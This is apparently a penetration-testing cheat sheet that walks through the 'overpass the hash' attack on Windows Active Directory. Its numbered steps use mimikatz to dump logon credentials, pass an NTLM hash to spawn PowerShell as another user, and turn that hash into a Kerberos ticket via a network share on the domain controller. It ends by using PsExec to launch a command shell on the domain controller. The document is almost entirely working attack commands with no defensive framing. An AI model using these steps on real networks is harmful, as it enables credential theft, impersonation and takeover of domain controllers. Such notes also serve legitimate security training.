Previous

Overpass the hash

With overpass the hash, we can “over” abuse a NTLM user hash to gain a full Kerberos Ticket
Granting Ticket (TGT) or service ticket, which grants us access to another machine or service as
that user.

1) Transfer all 3 mimikatz file to run mimikatz.exe

mimikatz.exe

2) Give privilege access

privilege::debug

3) sekurlsa::logonpasswords

Skip this step, if you already have hash

4) sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm hash> /run:PowerShell.exe

At this point, we have a new PowerShell session that allows us to execute commands as
<user>.

5) exit mimikatz

6) klist

No Kerberos tickets have been cached, but this is expected since <user> has not performed
an interactive login.

7) net use \\<dc_machine_name>

However, let’s generate a TGT by authenticating to a network share on the domain controller or another service with net use:

8) klist

We have now converted our NTLM hash into a Kerberos TGT, allowing us to use any tools that
rely on Kerberos authentication (as opposed to NTLM) such as the official PsExec application
from Microsoft

9) .\PsExec.exe \\<dc_machine_name> cmd.exe

10) ipconfig to check

successfully reused the Kerberos TGT to launch a command shell on the domain controller.